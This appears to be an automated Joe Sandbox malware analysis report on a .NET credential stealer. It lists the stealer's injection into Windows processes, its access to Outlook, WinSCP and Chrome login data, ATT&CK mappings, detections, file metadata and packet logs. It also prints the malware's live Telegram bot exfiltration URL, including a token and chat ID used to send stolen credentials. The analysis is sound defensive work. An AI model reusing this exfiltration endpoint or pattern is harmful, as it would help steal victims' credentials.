    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

    Stealing of Sensitive Information

    barindex
    Yara detected BluStealer
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Yara detected a310Logger
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Yara detected ThunderFox Stealer
    Source: Yara matchFile source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: Yara matchFile source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected BluStealer
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Yara detected a310Logger
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
    Yara detected ThunderFox Stealer
    Source: Yara matchFile source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath Interception311
    Process Injection    		1
    Masquerading    		1
    OS Credential Dumping    		1
    Security Software Discovery    		Remote Services1
    Email Collection    		Exfiltration Over Other Network Medium1
    Web Service    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools    		1
    Credentials in Registry    		1
    Process Discovery    		Remote Desktop Protocol11
    Archive Collected Data    		Exfiltration Over Bluetooth11
    Encrypted Channel    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion    		Security Account Manager31
    Virtualization/Sandbox Evasion    		SMB/Windows Admin Shares1
    Data from Local System    		Automated Exfiltration2
    Non-Application Layer Protocol    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
    Process Injection    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput CaptureScheduled Transfer13
    Application Layer Protocol    		SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA Secrets2
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information    		Cached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items21
    Software Packing    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe26%VirustotalBrowse
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe100%AviraTR/Crypt.XPACK.Gen7
    SecuriteInfo.com.W32.AIDetectNet.01.19566.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    14.0.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.461f2c8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.470f308.3.unpack100%AviraTR/Dropper.GenDownload File
    0.0.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.f10000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
    16.0.AppLaunch.exe.4e00000.0.unpack100%AviraTR/Dropper.MSIL.GenDownload File
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.45f72a8.0.unpack100%AviraTR/Patched.Ren.GenDownload File
    0.2.SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.466f2e8.2.unpack100%AviraTR/Dropper.GenDownload File

    Domains

    SourceDetectionScannerLabelLink
    dual-a-0001.a-msedge.net0%VirustotalBrowse
    windowsupdatebg.s.llnwi.net0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://james.newtonking.com/projects/json0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dual-a-0001.a-msedge.net
    		204.79.197.200
    		truefalseunknown
    api.telegram.org
    		149.154.167.220
    		truefalse
      		high
      windowsupdatebg.s.llnwi.net
      		95.140.236.128
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\userfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://api.telegram.org/QvMSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://api.telegram.org/botSecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpfalse
              		high
              http://james.newtonking.com/projects/jsonSecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.359072458.000000000340B000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://api.telegram.org/MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                149.154.167.220
                		api.telegram.orgUnited Kingdom
                		62041TELEGRAMRUfalse

                General Information

                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679095
                Start date and time: 05/08/202209:06:102022-08-05 09:06:10 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 29s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.W32.AIDetectNet.01.19566.31995 (renamed file extension from 31995 to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:26
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/2@1/1
                EGA Information:
                • Successful, ratio: 66.7%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 82%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 20.190.159.3, 20.190.159.19, 20.190.159.1, 40.126.31.70, 20.190.159.5, 40.126.31.64, 20.190.159.22, 40.126.31.68, 23.211.4.86, 20.82.209.183, 95.140.236.128, 80.67.82.235, 80.67.82.211, 20.54.89.106, 40.125.122.176, 52.242.101.226, 20.223.24.244
                • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.co
                • Execution Graph export aborted for target MSBuild.exe, PID 6000 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:08:05API Interceptor598x Sleep call for process: MSBuild.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):323
                Entropy (8bit):5.341038075456123
                Encrypted:false
                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21t92W+P12MUAvvrs:Q3La/KDLI4MWuPk21t92n4M6
                MD5:9FEAEEB3F595D644B8A003CA116508D1
                SHA1:E2A4B06B16147F0C77AE2839DF37E9FFEB645DBE
                SHA-256:37C92A24F9BD9FBF354209FE9DDA880B5B9C117F2CC863764EFD7F303548696D
                SHA-512:DAE054E5DB8E869347F415FA57150B352381D1EBB90CF3D67BBFF69B4B27E0F2047E24B4E2BE36EE79EE2E94E766533772E9FF61969805C3709BD94906DBF2BA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.log

                Download File
                Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1223
                Entropy (8bit):5.346062503059366
                Encrypted:false
                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4Kx1qE4qpAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoIHKx1qHmAHKzvUHKdHH
                MD5:3DDB3395410AB0225D8446C3FE175E6B
                SHA1:50B188BB284BA077F95F474772B21AC99BDBDA92
                SHA-256:1A6B66ED2247FED43E928FA030AE380471D074E2C38B0AFD938AA1CD06C5D62F
                SHA-512:5F5BDCFFCA48350ADA596BC040B2984D2076E97FE15341D5BF69D57C24E7FD124ACCA7369C6093089D9062DE2AB2207E70A97511C53FD6575555A1AC7871C148
                Malicious:true
                Reputation:low
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\W

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.289280780238567
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
                File size:2457088
                MD5:7278f8490937cab29d3dd5bc75cb52ab
                SHA1:69a0419c995fc139ea27e731a44205cb1b686f1d
                SHA256:0fabbda008ee7544a4f2d1bdaf5621f19bc41e82740f293dfe1644fc0af9230b
                SHA512:71f6b363327b6ef6d5204cbfd31e2cb71d456ef54c24d53cd504bed6eec5b14079605f60cf47bc7ec9fbffe8b89ca37766b418ab236801193838417b4587deb7
                SSDEEP:24576:l5niq2/Fw0WbSwK5QUhHcAxP0IXucQfPTO8k4TgjbTG7lVgFyHJSf2uwkYABYPzT:iMSH5DrPHX3wDgFmLIYPzR3nc89UZcn
                TLSH:09B5582DCA8DEF35F6A9A97EF6F945278C6FE9091C42ED0E3390511B0E7D886160C193
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.b..............0..~$.........>.$.. ........@.. ........................%...........@................................

                File Icon

                Icon Hash:64e4cc8df0f0f0b0

                Static PE Info

                General

                Entrypoint:0x649c3e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x62EC709A [Fri Aug 5 01:21:30 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x249bec0x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000xfc00.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25a0000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x247c440x247e00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x24a0000xfc000xfc00False0.8014942956349206data7.473628318342458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x25a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                RT_ICON0x24a1600x528GLS_BINARY_LSB_FIRST
                RT_ICON0x24a6980x1428dBase IV DBT of @.DBF, block length 5120, next free block index 40, next free block 0, next used block 0
                RT_ICON0x24bad00x2d28data
                RT_ICON0x24e8080xa9cbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                RT_GROUP_ICON0x2591e40x3edata
                RT_VERSION0x2592340x5dcdata
                RT_MANIFEST0x2598200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 09:07:16.787971020 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788103104 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788146019 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788177013 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788207054 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788223982 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788275957 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788296938 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.788321018 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.812239885 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812278032 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812285900 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812297106 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812304974 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812310934 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812330008 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812371016 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812382936 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812414885 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812452078 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812463045 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812469959 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812491894 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812501907 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812513113 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812524080 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812612057 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812624931 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812635899 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812645912 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812691927 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812704086 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812716961 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812751055 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.812774897 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812788010 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812798023 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812808990 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812820911 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812829971 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812863111 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812892914 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812903881 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812913895 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812925100 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.812968016 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813009977 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813019991 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813050032 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813061953 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813086033 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813117027 CEST49695443192.168.2.3131.253.33.200
                Aug 5, 2022 09:07:16.813129902 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813141108 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813172102 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813183069 CEST44349695131.253.33.200192.168.2.3
                Aug 5, 2022 09:07:16.813193083 CEST44349695131.253.33.200192.168.2.3
